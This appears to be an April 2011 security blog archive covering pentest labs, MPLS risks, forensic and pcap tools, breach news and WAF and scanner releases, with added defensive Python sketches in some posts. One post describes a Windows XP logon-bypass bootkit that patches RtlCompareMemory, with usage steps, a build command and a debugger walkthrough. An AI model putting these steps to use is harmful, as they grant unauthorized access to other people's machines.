Wednesday, April 27, 2011

Call to Web APP Pentesters

OWASP Hackademic Challenges

This is an open source project that helps us test our knowledge of web application security. It can actually be used to attack web applications in a realistic but controlled, safe environment.

You can download the current version here. Don't feel like setting up the environment yourself? Try the live hosted version. Kudos to the OWASP team.

Least frequently occurring strings

Dave Hull has a nice blog article describing the use of the "Least Frequency of Occurrence" principle that Peter Silberman spoke about at the SANS Forensics Summit. Please keep in mind that it is a hypothetical scenario based on an actual case. There are possibly better ways of "finding the evil" in the hypothetical case, but it's meant to show how this concept works.

Read more here.
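To show the principle at work, here is an added Python example (my own sketch, not Dave Hull's or Peter Silberman's code; the autostart entries and hashes are constructed samples): stack one artifact type across a set of hosts, count on how many hosts each (path, hash) pair appears, and surface the least frequent ones. The second view groups by file name, which is where a well-known name with a one-off hash or location stands out.

```python
from collections import defaultdict

# Constructed sample: autostart entries collected from four hosts (not real data).
# Each entry is (host, image path, sha1 of the image); the hashes are made-up placeholders.
AUTORUNS = [
    ("host01", r"C:\Windows\System32\svchost.exe", "aaaa"),
    ("host02", r"C:\Windows\System32\svchost.exe", "aaaa"),
    ("host03", r"C:\Windows\System32\svchost.exe", "aaaa"),
    ("host04", r"C:\Windows\System32\svchost.exe", "dddd"),   # known path, different hash
    ("host01", r"C:\Program Files\Vendor\agent.exe", "bbbb"),
    ("host02", r"C:\Program Files\Vendor\agent.exe", "bbbb"),
    ("host03", r"C:\Program Files\Vendor\agent.exe", "bbbb"),
    ("host04", r"C:\Program Files\Vendor\agent.exe", "bbbb"),
    ("host02", r"C:\Users\Public\svchost.exe", "cccc"),      # familiar name, odd location
]

def normalize(path: str) -> str:
    """Case-fold and unify separators so the same file stacks under one key."""
    return path.lower().replace("/", "\\")

def stack(entries):
    """Count on how many distinct hosts each (path, hash) pair occurs; rarest first."""
    hosts = defaultdict(set)
    for host, path, sha1 in entries:
        hosts[(normalize(path), sha1)].add(host)
    return sorted((len(h), item) for item, h in hosts.items())

def least_frequent(entries, max_hosts=1):
    """The LFO candidates: items seen on at most max_hosts hosts."""
    return [item for n, item in stack(entries) if n <= max_hosts]

def variants_by_name(entries):
    """Group by file name, so a well-known name with a one-off hash or path stands out."""
    out = defaultdict(dict)
    for n, (path, sha1) in stack(entries):
        out[path.rsplit("\\", 1)[-1]][(path, sha1)] = n
    return dict(out)

if __name__ == "__main__":
    for n, item in stack(AUTORUNS):
        print(n, item)
    print("LFO candidates:", least_frequent(AUTORUNS))
    print("svchost.exe variants:", variants_by_name(AUTORUNS)["svchost.exe"])
```

On the sample the two one-host items are the svchost.exe copy under C:\Users\Public and the System32 svchost.exe whose hash matches nobody else's; on real data the same stacking works for services, scheduled tasks, DLLs loaded by a process, or any other artifact you can collect from every host.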

Tuesday, April 26, 2011

MPLS and security

As part of my work, I'm trying to figure out the security concerns of MPLS, and here are my brain droppings on the subject.

My network guys insist that MPLS is private and therefore secure, but is it really? It is true that MPLS networks are generally considered private networks and do not require encryption. But this relies heavily on the provider's configuration and implementation of the MPLS network. If the provider's MPLS network is exposed to the Internet, either through an LSR or any other device, then it has to be deemed "untrusted". MPLS relies heavily on label switching and is just another specialized form of IP network, so how "private" an MPLS network is depends entirely on how "private" it has been engineered to be. Though private addressing is used on the MPLS network, this is private to the carrier and may not be private to the customer. And the mere use of private addressing by no means guarantees that this traffic never comes into contact with the Internet or Internet traffic. It seems to be fairly common practice for carriers to use VRFs on their core routers to forward both MPLS and Internet traffic on the same equipment. As a matter of fact, it is fairly common practice to route ATM and Frame Relay networks over MPLS backbones.

Taking this into consideration, it would be prudent for a security engineer to look into the MPLS configs more closely, work with the carriers to understand how they implement MPLS, and see if you can peer into their LSR configs. It's only a matter of time before someone figures out a way to attack MPLS successfully via the public Internet, and then everyone will rush to respond to the situation. Ensuring encryption of your MPLS circuits will go a long way in keeping your company from showing up on the front page.

Thursday, April 21, 2011

Growly notes

I have been using a Mac for a while now and missed Microsoft OneNote, which I use extensively on my work machine. Today I came across a gem for the Mac called Growly Notes. Growly Notes brings a OneNote-like interface and lots of features to the Mac for free. It lacks many of the robust features of OneNote, but works well for me. Being an active OneNote user, getting comfortable with Growly did not take long. Almost everything works the same way, and the interface feels very familiar.

Kudos to the Growly Bird Software guys. Please give a shout out to those guys.




FileInfo is an open source GUI forensic tool designed to extract information from files. A text version has been available for a while.

This Beta version allows you to do the following:

- Meta Data Information

- String ASCII and Unicode

- Hash MD5 and SHA1

- Detect and Show PE32 Information

- Detect and Extract Thumbnail from JPEG file

More information can be found here.
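The five features above map onto a handful of well-known file-format checks. As an added example (not FileInfo's own code, which is a GUI tool; this is a small Python sketch I put together), here is how each check can be done on a byte buffer: MD5/SHA1 hashing, ASCII and UTF-16LE string extraction, a PE32 header walk (DOS header, e_lfanew, PE signature, COFF header, optional header magic), and pulling the embedded EXIF-style thumbnail out of a JPEG. The PE and JPEG inputs at the bottom are constructed stand-ins, not real files.

```python
import hashlib
import re
import struct

def file_hashes(data: bytes) -> dict:
    """MD5 and SHA1 of the whole buffer, as hex strings."""
    return {"md5": hashlib.md5(data).hexdigest(),
            "sha1": hashlib.sha1(data).hexdigest()}

def ascii_strings(data: bytes, min_len: int = 4) -> list:
    """Printable ASCII runs of at least min_len characters (what `strings` prints)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]

def unicode_strings(data: bytes, min_len: int = 4) -> list:
    """UTF-16LE runs of printable characters, the form Windows binaries use."""
    pattern = rb"(?:[\x20-\x7e]\x00){%d,}" % min_len
    return [m.group().decode("utf-16le") for m in re.finditer(pattern, data)]

def pe32_info(data: bytes):
    """Walk the DOS header to the PE signature and return COFF header facts, or None."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 26 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, nsections, timestamp = struct.unpack_from("<HHI", data, e_lfanew + 4)
    # The optional header starts 24 bytes after the signature; its magic tells PE32 from PE32+
    magic = struct.unpack_from("<H", data, e_lfanew + 24)[0]
    return {"machine": hex(machine), "sections": nsections,
            "timestamp": timestamp, "pe32plus": magic == 0x20B}

def jpeg_thumbnail(data: bytes):
    """Return the first JPEG embedded inside a JPEG (typically the EXIF thumbnail), or None.
    Relies on the JPEG rule that 0xFF inside entropy-coded data is always byte-stuffed or
    followed by an RSTn marker, so a bare FFD8/FFD9 can only be a real SOI/EOI marker."""
    if data[:2] != b"\xff\xd8":
        return None
    start = data.find(b"\xff\xd8\xff", 2)
    if start < 0:
        return None
    end = data.find(b"\xff\xd9", start)
    return None if end < 0 else data[start:end + 2]

def file_info(data: bytes) -> dict:
    """The whole report: hashes, strings, PE header and embedded thumbnail."""
    return {"hashes": file_hashes(data), "ascii": ascii_strings(data),
            "unicode": unicode_strings(data), "pe32": pe32_info(data),
            "thumbnail": jpeg_thumbnail(data)}

# ---- constructed samples (not real files) ----
def build_sample_pe() -> bytes:
    dos = bytearray(b"MZ" + b"\x00" * 0x3E)           # 64-byte DOS header stub
    struct.pack_into("<I", dos, 0x3C, 0x40)            # e_lfanew -> PE header right after it
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 3, 0x4D9F1A2B, 0, 0, 0xE0, 0x102)
    opt_magic = struct.pack("<H", 0x10B)               # 0x10B = PE32, 0x20B = PE32+
    body = (b"\x00This program cannot be run in DOS mode\x00\x00"
            + "Hello".encode("utf-16le") + b"\x00\x00")
    return bytes(dos) + coff + opt_magic + body

SAMPLE_THUMB = b"\xff\xd8\xff\xdb\x00\x04\x01\x02\xff\xd9"   # tiny stand-in for a thumbnail
SAMPLE_JPEG = b"\xff\xd8\xff\xe1\x00\x20Exif\x00\x00" + SAMPLE_THUMB + b"\xff\xd9"

if __name__ == "__main__":
    print(file_info(build_sample_pe()))
    print(file_info(SAMPLE_JPEG)["thumbnail"])
```

The thumbnail scan is deliberately simple; a full EXIF parser would walk the APP1 TIFF directory to the JPEGInterchangeFormat tag instead of searching for a second SOI marker, but the marker rule quoted in the docstring is what makes the shortcut safe on well-formed files.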


Tuesday, April 12, 2011

Splitcap - the PCAP file splitter

SplitCap is an open source pcap file splitter. It splits one big PCAP file into multiple files based on TCP and UDP sessions, and can alternatively produce one PCAP file per host-pair instead of per session. TCP and UDP sessions in SplitCap are defined as bi-directional flows, i.e., all frames/packets with the same 5-tuple (source host, destination host, source port, destination port, transport protocol), regardless of packet direction, are considered part of the same session.

SplitCap is written in C# using .NET Framework 2.0.

Usage: SplitCap [OPTIONS]…

-r <input_file> : Set the pcap file to read from
-o <output_directory> : Manually specify output directory
-d : Delete previous output data
-p <nr_parallel_sessions> : Set the number of parallel sessions to keep in memory (default = 10000). More sessions might be needed to split pcap files from busy links such as an Internet backbone link; this will however require more memory.
-b <file_buffer_bytes> : Set the number of bytes to buffer for each session/output file (default = 10000). Larger buffers will speed up the process due to fewer disk write operations, but will occupy more
-s <GROUP> : Split traffic and group packets to pcap files based on <GROUP>. Possible values for <GROUP> are:
    flow : Each flow, i.e. unidirectional traffic for a 5-tuple, is grouped
    host : Traffic grouped to one file per host. Most packets will end up in two files.
    hostpair : Traffic grouped based on host-pairs communicating
    nosplit : Do not split traffic. Only create ONE output pcap.
    (default) session : Packets for each session (bi-directional flow) are grouped
-ip <IP address to filter on>
-port <port number to filter on>
-y <FILETYPE> : Output file type for extracted data. Possible values for <FILETYPE> are:
    L7 : Only store application layer data
    (default) pcap : Store complete pcap frames

Example 1: SplitCap -r dumpfile.pcap
Example 2: SplitCap -r dumpfile.pcap -o session_directory
Example 3: SplitCap -r dumpfile.pcap -s hostpair
Example 4: SplitCap -r dumpfile.pcap -s flow -y L7
Example 5: SplitCap -r dumpfile.pcap -ip -port 80 -port 443 -s nosplit

SplitCap was created as part of the Statistical Protocol IDentification research project carried out by Erik Hjelmvik with funding from .SE (The Swedish Internet Infrastructure Foundation).

SplitCap can, since version 1.5, also be used to efficiently filter a large PCAP file based on one or several IP addresses or TCP/UDP port numbers. Simply use the “-s nosplit” option together with one or several “-port” or “-ip” switches to specify what traffic to keep from the large pcap file. SplitCap performs this type of filtering much faster and with far less memory usage than tshark.
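To make the flow/session/hostpair/host distinction concrete, here is an added Python example (my own sketch, not SplitCap's C# source) that parses a pcap, extracts the 5-tuple from each Ethernet/IPv4 TCP or UDP frame and groups records the way each -s mode does, with -ip/-port style filtering on top. The capture it runs on is constructed inline (four frames, checksums left at zero), so it needs no input file.

```python
import struct
from collections import defaultdict

# pcap global header: magic, version 2.4, tz 0, sigfigs 0, snaplen 65535, link type 1 (Ethernet)
PCAP_GLOBAL_HDR = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)

def pcap_records(data: bytes):
    """Yield (ts_sec, ts_usec, frame) for each record of a little-endian pcap buffer."""
    if struct.unpack_from("<I", data, 0)[0] != 0xA1B2C3D4:
        raise ValueError("only little-endian microsecond pcap is handled here")
    off = 24
    while off + 16 <= len(data):
        ts_sec, ts_usec, incl_len, _orig_len = struct.unpack_from("<IIII", data, off)
        off += 16
        yield ts_sec, ts_usec, data[off:off + incl_len]
        off += incl_len

def five_tuple(frame: bytes):
    """(src_ip, dst_ip, src_port, dst_port, proto) of an Ethernet/IPv4 TCP or UDP frame, else None."""
    if len(frame) < 38 or frame[12:14] != b"\x08\x00":
        return None
    ihl = (frame[14] & 0x0F) * 4
    proto = frame[23]
    if proto not in (6, 17):
        return None
    src = ".".join(map(str, frame[26:30]))
    dst = ".".join(map(str, frame[30:34]))
    sport, dport = struct.unpack_from("!HH", frame, 14 + ihl)
    return src, dst, sport, dport, proto

def group_keys(t, mode: str) -> list:
    """Which output file(s) a packet belongs to under each -s mode."""
    src, dst, sport, dport, proto = t
    if mode == "flow":                       # unidirectional: direction is part of the key
        return [t]
    if mode == "session":                    # bidirectional: order the endpoints canonically
        return [tuple(sorted([(src, sport), (dst, dport)])) + (proto,)]
    if mode == "hostpair":
        return [tuple(sorted([src, dst]))]
    if mode == "host":                       # one file per host, so most packets land in two
        return [src, dst]
    if mode == "nosplit":
        return ["all"]
    raise ValueError("unknown group mode: " + mode)

def split_pcap(data: bytes, mode: str = "session", ips=(), ports=()) -> dict:
    """Group records into per-key pcap buffers; ips/ports act like the -ip/-port filters."""
    groups = defaultdict(lambda: bytearray(PCAP_GLOBAL_HDR))
    for ts_sec, ts_usec, frame in pcap_records(data):
        t = five_tuple(frame)
        if t is None:
            continue
        src, dst, sport, dport, _ = t
        if ips and src not in ips and dst not in ips:
            continue
        if ports and sport not in ports and dport not in ports:
            continue
        rec = struct.pack("<IIII", ts_sec, ts_usec, len(frame), len(frame)) + frame
        for key in group_keys(t, mode):
            groups[key] += rec
    return {k: bytes(v) for k, v in groups.items()}

def record_count(pcap: bytes) -> int:
    return sum(1 for _ in pcap_records(pcap))

# ---- constructed sample capture (checksums left zero; not real traffic) ----
def build_frame(src_ip, dst_ip, sport, dport, proto, payload=b"") -> bytes:
    eth = b"\x00" * 12 + b"\x08\x00"
    if proto == 6:   # TCP: ports, seq, ack, data offset 5, flags PSH|ACK, window, csum, urg
        l4 = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 0x50, 0x18, 8192, 0, 0)
    else:            # UDP: ports, length, checksum
        l4 = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4) + len(payload), 0, 0, 64, proto, 0,
                     bytes(int(o) for o in src_ip.split(".")),
                     bytes(int(o) for o in dst_ip.split(".")))
    return eth + ip + l4 + payload

def build_sample_pcap() -> bytes:
    frames = [
        build_frame("10.0.0.1", "10.0.0.2", 40000, 80, 6, b"GET / HTTP/1.0\r\n\r\n"),
        build_frame("10.0.0.2", "10.0.0.1", 80, 40000, 6, b"HTTP/1.0 200 OK\r\n"),
        build_frame("10.0.0.1", "10.0.0.2", 40001, 443, 6),
        build_frame("10.0.0.1", "10.0.0.3", 5353, 53, 17, b"\x00" * 12),
    ]
    out = bytearray(PCAP_GLOBAL_HDR)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1302000000 + i, 0, len(f), len(f)) + f
    return bytes(out)

if __name__ == "__main__":
    cap = build_sample_pcap()
    for mode in ("flow", "session", "hostpair", "host", "nosplit"):
        print(mode, {k: record_count(v) for k, v in split_pcap(cap, mode).items()})
```

The same four frames come out as four files in flow mode, three in session mode (the request and its reply share one canonical key), two in hostpair mode and three in host mode, where the 10.0.0.1 file holds every packet because that host is on one side of each conversation.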

More details about SplitCap here.

Monday, April 11, 2011

Mozilla Firefox Internals & Attack Strategies

This paper aims to detail some of the techniques and methods that exist to subvert a fully patched and functioning Firefox browser. It aims to provide insight to developers and end users on some methodologies that could be used by malicious users. We will look at some of the basic, important components that make up the Mozilla platform and various attacks that can be targeted against it.

Firefox is a trusted browsing platform used by millions across the globe, by experts and novices alike. One of the biggest advantages of Mozilla, and a reason for its massive success, is an extensible plug-in model that allows developers to add features to the Firefox environment beyond what the original authors envisioned. Our discussion is focused on these extension modules and how a malicious developer can use some of their powerful features to subvert Firefox and the underlying system. Extension code runs with the same privileges that the browser enjoys.

More Details


Wappalyzer is a Firefox add-on that reveals the technologies used on websites, such as CMS and e-commerce systems, message boards, JavaScript frameworks, hosting panels, analytics tools and more. The company behind Wappalyzer, funded by AOE media, collects information about web-based software to create publicly available statistics revealing their growth over time. Most of the data is collected anonymously (according to the company) from this Firefox add-on, as installed by users.

You can download the Add-On here, or read more about the tool here.

Sniff Network without WinPcap - RawCap

NETRESEC has announced the release of RawCap, a free raw-sockets sniffer for Windows. What does this mean to incident responders and pentesters? It means:
  • It can sniff on any interface that has an IP address, including loopback addresses
  • No external libraries or DLLs are needed
  • No installation is required; the executable is self-sufficient and only 17 kB
  • It can sniff most interface types, including WiFi and PPP interfaces
  • Minimal memory and CPU load
For now RawCap takes two arguments:
  • The first argument is the IP address or interface number to sniff from
  • The second argument is the path/file to write the captured packets to
Piping this output to other filters opens up an endless array of possibilities. You can read more about this tool here.

Friday, April 8, 2011

Hartford Servers Compromised

The Hartford Servers Infected with Password-Stealing Malware

(April 6 & 7, 2011)

The Hartford insurance company has notified approximately 300 employees, contractors and customers of a security breach in which attackers managed to install password-stealing malware known as Qakbot on some of the company's servers.  The attack was discovered in February 2011; fewer than 19 customers were affected.  The Hartford sent letters to people who had logged in to an infected server between February 22 and 28, 2011.

The press loves big numbers, so incidents like the Epsilon compromise get lots of attention. But there are huge numbers of compromises like this one happening that are much more targeted and often actually more damaging than many of the large scale attacks because they go undetected longer. Qakbot had some really sophisticated variants that actually only forward targeted credentials out to command and control/drop sites, reducing its "noise" level even


Fired Employee Indicted For Hacking Gucci Network

Authorities on Monday indicted a former IT
employee at Gucci for hacking into the company's computer network,
deleting files and emails, and causing an estimated $200,000 in damage.

"Computer hacking is not a game. It is a serious threat to corporate
security that can have a devastating effect on personal privacy, jobs,
and the ability of a business to function at all," said Manhattan
district attorney Cyrus R. Vance Jr., in a statement. 

How did a former employee gain access to a corporate network and delete
data? Authorities accuse Yin of creating "a VPN token in the name of a
fictional employee," and then, when he was fired, stealing this
USB-based token to gain remote access.

According to authorities, "in the months that followed, using the VPN
token, Yin exploited his familiarity with Gucci's network configuration
and administrator-level passwords to gain nearly unfettered access to
Gucci's network."

Rigorous internal IT auditing is essential to mitigate the risk from disgruntled employees and from orphan/hidden accounts that employees in a position to abuse their privileges could create. What did your company's internal audit find out!!?? Dormant but active accounts are screaming sirens waiting to be noticed. Use technologies like SIEM to track usage of service accounts beyond their intended use.
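The audit and SIEM checks above boil down to a few joins between HR data, the directory and the remote-access logs. The following is an added example in Python (not from the article; the roster, account export and VPN log lines are constructed samples with made-up names and RFC 5737 addresses) that flags accounts with no HR owner, enabled accounts belonging to terminated staff, dormant-but-enabled accounts, VPN logins after a termination date, and service accounts used for VPN access.

```python
import re
from datetime import date

# ---- constructed sample data (made-up names; addresses from RFC 5737 ranges) ----
# HR roster: user -> termination date (ISO) or None if still employed
HR_ROSTER = {"asmith": None, "bjones": None, "cdoe": "2011-03-01"}
# Accounts that legitimately have no HR owner; they are not meant for remote/interactive use
SERVICE_ACCOUNTS = {"svc_backup"}
# Directory export: (account, enabled, last logon date)
ACCOUNTS = [
    ("asmith", True, "2011-04-06"),
    ("bjones", True, "2010-12-20"),
    ("cdoe", True, "2011-04-02"),
    ("svc_backup", True, "2011-04-06"),
    ("jdoe2", True, "2011-04-05"),
]
# VPN gateway authentication log (constructed lines in a made-up format)
VPN_LOG = [
    "2011-04-02T23:14:02 vpn-gw auth ok user=cdoe token=tok-001 src=198.51.100.7",
    "2011-04-06T09:01:11 vpn-gw auth ok user=asmith token=tok-002 src=203.0.113.5",
    "2011-04-06T02:40:45 vpn-gw auth ok user=svc_backup token=tok-003 src=198.51.100.9",
    "2011-04-06T08:12:00 vpn-gw auth fail user=jdoe2 token=tok-004 src=198.51.100.7",
]
LOG_RE = re.compile(r"^(\d{4}-\d{2}-\d{2})T\S+ vpn-gw auth (ok|fail) "
                    r"user=(\S+) token=(\S+) src=(\S+)$")

def audit_accounts(accounts, roster, service_accounts, as_of, dormant_days=90):
    """Directory-side checks: orphan, terminated-but-enabled, dormant-but-enabled."""
    findings = set()
    for user, enabled, last_logon in accounts:
        if user not in roster and user not in service_accounts:
            findings.add(("orphan_account", user))            # nobody in HR owns this account
        elif user in roster and roster[user] is not None and enabled:
            findings.add(("terminated_still_enabled", user))
        if enabled and (as_of - date.fromisoformat(last_logon)).days > dormant_days:
            findings.add(("dormant_account", user))
    return findings

def audit_vpn(log_lines, roster, service_accounts):
    """Log-side checks: who is actually using remote access, and should they be?"""
    findings = set()
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        day, result, user, _token, _src = m.groups()
        if user in service_accounts:
            findings.add(("service_account_vpn_use", user))   # beyond the account's intended use
        elif user not in roster:
            findings.add(("vpn_attempt_unknown_account", user))  # failed attempts count too
        elif roster[user] is not None and result == "ok" and day > roster[user]:
            findings.add(("vpn_after_termination", user))
    return findings

def run_audit(as_of=date(2011, 4, 8)):
    """Union of both audits; as_of is the reference date for the dormancy window."""
    return (audit_accounts(ACCOUNTS, HR_ROSTER, SERVICE_ACCOUNTS, as_of)
            | audit_vpn(VPN_LOG, HR_ROSTER, SERVICE_ACCOUNTS))

if __name__ == "__main__":
    for rule, user in sorted(run_audit()):
        print(f"{rule:28} {user}")
```

The HR roster is the piece most organisations forget to feed into the SIEM; without it, the "terminated but still logging in" and "account with no owner" cases are invisible, because from the directory's point of view both look like perfectly normal enabled users.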

Sniffing USB traffic with VMWare

VMWare offers the possibility to dump any USB traffic at the lowest level to a dump file. We'll describe here how to activate this feature, and additionally publish a script to convert the dump file to the PCAP format, suitable for use with Wireshark.

Enable USB logging

VMWare can be configured to dump all the low-level USB traffic going to a given virtual machine to a file on the host. This functionality is activated by adding a few lines to the .vmx virtual machine control file:

monitor = "debug"
usb.analyzer.enable = TRUE
usb.analyzer.maxLine = 8192
mouse.vusb.enable = FALSE

This enables logging of the raw USB traffic to the vmware.log file, with the USBIO prefix. The maxLine setting enables logging of the full USB packet payload. Once you start the virtual machine with these settings, beware that the log file may become very big very quickly!

To make sense of the data gathered this way, a very good piece of software is available: vusb-analyzer. You can also refer to the project page for more information on the effects of the VMWare configuration elements. The VMWare log format is not very compact or interoperable, so Sogeti ESEC Lab wrote a script that converts the USB information into PCAP format. This way, you can watch the flow in Wireshark or many other tools. Please note that the PCAP format for USB is not very well documented, so ymmv.

Bypassing XP Logon - without resetting any passwords (read Stealth)

The idea is to use a kernel debugger to modify the routine msv1_0!MsvpPasswordValidate so that it always returns TRUE, even for an incorrect password. I was impressed by the simplicity of the idea and decided to implement it using a bootable CD instead of a debugger. A great compilation of information on bootable CDs is eEye's BootRoot [2]. Another inspirational source is [3].

Theory of operation:

Flow of execution
0. hic sunt leones (DRAM initialization, POST, etc.) - see [4]
1. boot from CD:
        CD code hooks int 15h and copies itself to RAM
        CD code boots NTLDR from HDD
2. boot from HDD
        NTLDR is running
        NTLDR calls int 15h
        int 15h hooked handler patches NTDLR with 32 bit stager
        NTLDR is running
        32 bit stager is called
        32 bit stager calls payload
        payload hooks IoCreateDriver
        NTLDR is running
        IoCreateDriver is called, hook registers custom callback
            using PsSetLoadImageNotifyRoutine
        PspLoadImageNotifyRoutine notifies us about images being loaded
        if the image name is msv1_0.dll, hook (IAT style) RtlCompareMemory
3. Windows logon dialog appears and arbitrary password is accepted
        for every account


  1. int 15h is used instead of the usual int 13h used in BootRoot and its clones
  2. int 15h was found to be viable by using a custom PCI-ROM based interrupt sniffer, and leads to more compact code
  3. msv1_0!MsvpPasswordValidate is not hooked, because it's not exported
  4. the password is also validated in ADVAPI32!SystemFunction031
  5. both functions mentioned above call RtlCompareMemory, which is exported
  6. RtlCompareMemory is modified so that it returns 0 (true) for all blocks of the length of a password hash
  7. it's a dirty hack, it's not intended for production use :)

So, how does it work? When you enter a password, Windows computes the hash of the password and compares it with the stored hash of the correct password. But the comparison routine was modified so that it returns true for any two hashes, i.e. for any password you enter.

Using the Code

This tool was designed for a CD ISO and Windows XP x86. Feel free to try it with a USB flash disk or modify it for newer Windows versions.

  1. Burn the ISO on CD.
  2. Boot Windows XP machine from the CD.
  3. When logon dialog appears, enter required username (e.g. Administrator, SUPPORT_388945a0, etc.) and press enter.
  4. If everything worked out correctly, you're now logged in.

To build the project from source, you need FASM.exe and Microsoft CDIMAGE.exe.

fasm boot.asm bootkit.rom && cdimage -bbootkit.rom C:\bootkit\root\ C:\bootkit.iso

Assume that C:\bootkit\root is an arbitrary non-empty folder that will be the root of the newly created ISO image, which will be written to C:\bootkit.iso.


code project site
Bootkit Source Code


To test the bootkit, you can set up XP in VMWare to boot from C:\bootkit.iso (don't forget to change the boot device in the VMWare BIOS to CD). If you want to see what's going on during the logon process, you can attach windbg.

  1. Grab your free copy of Debugging Tools for Windows from Microsoft and install it.
  2. Edit VMWare machine settings: Add Serial port, 'Output to named
    pipe', 'This end is the server.', 'The other end is application', finish
    and check 'Yield CPU on poll'.
  3. Start XP in VMWare and edit boot.ini using msconfig (add option /DEBUG with COM1 and fastest baudrate). Turn off XP.
  4. Start XP again and run windbg using a shortcut like this one:

    "C:\Program Files\Debugging Tools for Windows (x86)\windbg.exe" -y srv*c:\windows\symbols* -b -k com:pipe,

    If you're successful, you'll see:

    Microsoft (R) Windows Debugger Version 6.9.0003.113 X86
    Copyright (c) Microsoft Corporation. All rights reserved.

    Opened \\.\pipe\com_1
    Waiting to reconnect...
    Connected to Windows XP 2600 x86 compatible target, ptr64 FALSE
    Kernel Debugger connection established. (Initial Breakpoint requested)
    Symbol search path is: srv*c:\windows\symbols*;SRV**
    Executable search path is:
    Windows XP Kernel Version 2600 UP Free x86 compatible
    Built by: 2600.xpsp_sp2_rtm.040803-2158
    Kernel base = 0x804d7000 PsLoadedModuleList = 0x8055ab20
    System Uptime: not available
    Break instruction exception - code 80000003 (first chance)
    * *
    * You are seeing this message because you pressed either *
    * CTRL+C (if you run kd.exe) or, *
    * CTRL+BREAK (if you run WinDBG), *
    * on your debugger machine's keyboard. *
    * *
    * *
    * If you did not intend to break into the debugger, press the "g" key, then *
    * press the "Enter" key now. This message might immediately reappear. If it *
    * does, press "g" and "Enter" again. *
    * *
    804e3b25 cc int 3

  5. Now windbg is attached to Windows. Let's look at the hooked function IoCreateDriver:

    kd> u IoCreateDriver
    805d60e3 b8c3f00980 mov eax,8009F0C3h <- address of payload.asm/_stager
    805d60e8 ffd0 call eax <- call _stager
    kd> uf 8009F0C3h <- _stager
    8009f0c3 802c2407 sub byte ptr [esp],7
    8009f0c7 60 pushad
    8009f0c8 66bb53a3 mov bx,0A353h
    8009f0cc e80b010000 call 8009f1dc
    8009f0d1 68ecf00980 push 8009F0ECh <- address of payload.asm/
    8009f0d6 ffd0 call eax
    cleanup hook

    8009F0ECh <- PspLoadImageNotifyRoutine
    - checks if the loaded module is msv1_0.dll
    - if yes, hooks IAT RtlCompareMemory

  6. Module 'msv1_0.dll' is now patched. Enter 'g' and wait till logon screen appears. Then break in (Ctrl+Break).

    kd> !process 0 0 winlogon.exe
    PROCESS 819aaa88 SessionId: 0 Cid: 0274 Peb: 7ffd8000 ParentCid: 01f0
    DirBase: 0a5b2000 ObjectTable: e13d6110 HandleCount: 398.
    Image: winlogon.exe
    kd> .process /p /r 819aaa88
    Implicit process is now 819aaa88
    .cache forcedecodeuser done
    Loading User Symbols

    kd> uf msv1_0!MsvpPasswordValidate <- we want this function to return always TRUE
    77c69927 ?? ???
    ^ Memory access error in
    'u msv1_0!MsvpPasswordValidate l3'
    kd> .pagein msv1_0!MsvpPasswordValidate
    You need to continue execution (press 'g' <enter>) for the pagein to be brought in.
    When the debugger breaks in again, the page will be present.

    kd> g
    Break instruction exception - code 80000003 (first chance)
    804e3b25 cc int 3

    kd> dd msv1_0!_imp__RtlCompareMemory l1 <- this is IAT entry for RtlCompareMemory
    77c610cc 77c60fe5 <- and this is address of our
    new RtlCompareMemory: RtlCompareMemoryPatch

    kd> u 77c60fe5 <- payload.asm/RtlCompareMemoryPatch
    - if size of chunks to compare is 10h (hash size), then return 0 (=TRUE)
    - else call original RtlCompareMemory
    - it's a nasty hack, use different method in production use :)

  7. Now you can set a breakpoint using 'bp msv1_0!MsvpPasswordValidate' (to remove it, type 'bc*') and step through the login process using the commands 't' or 'p'. For help, type '.help command_name'.

Qualys Open Source WAF project "IronBee"

IronBee is a new open source project to build a universal web application security sensor.

Qualys is announcing the development of IronBee, a new open source project to build a universal web application security sensor. Our desire is not only to build the code and the rules, but also to focus on building a community around the project. In fact, we believe that building the community is the most important aspect of the project and the only way to ensure that it has a long life.

IronBee has been in development for several months now. Qualys has completed the initial design phase and the prototype implementation, and has the development and collaboration infrastructure ready. Now that there is a meaningful starting point, Qualys is inviting others to join. At this time, they are looking for early adopters and those who wish to participate in shaping the project:

  • Developers to work on the IronBee core and on the security modules.
  • Application defenders to tell us what they need and to provide feedback on our proposed solutions (e.g., configuration language, signature language).
  • Application security researchers to exchange attack information, write signatures and rules, and design new detection and protection techniques.
  • Web server and proxy developers to help us make IronBee work in their environments.
  • Distribution maintainers to package IronBee to run on their systems.
  • Infrastructure and cloud providers to help make IronBee effective for embedding into their infrastructures.

More Details can be found here.

Tuesday, April 5, 2011

Retina Community Free Vulnerability Assessment Scanner Released « IT Vulnerability & ToolsWatch

Retina Community is a free vulnerability scanner for up to 32 IPs, powered by the renowned Retina Network Security Scanner technology. Retina Community identifies vulnerabilities, configuration issues, and missing patches across operating systems, applications, devices, and virtual environments.

Much more than a stripped down “free trial” product, Retina Community gives you powerful vulnerability assessment across your environment to strengthen security and compliance. The free Retina Community product includes these capabilities:

  • Vulnerability assessment across operating systems, applications, devices, and virtual environments (32 IPs)
  • Zero-day vulnerability identification
  • SCAP configuration scanning
  • Integrated vulnerability updates and alerting
  • Detailed vulnerability and executive-level reporting
  • Report export to XML, CSV, and PDF
  • Online support and resources from eEye’s research team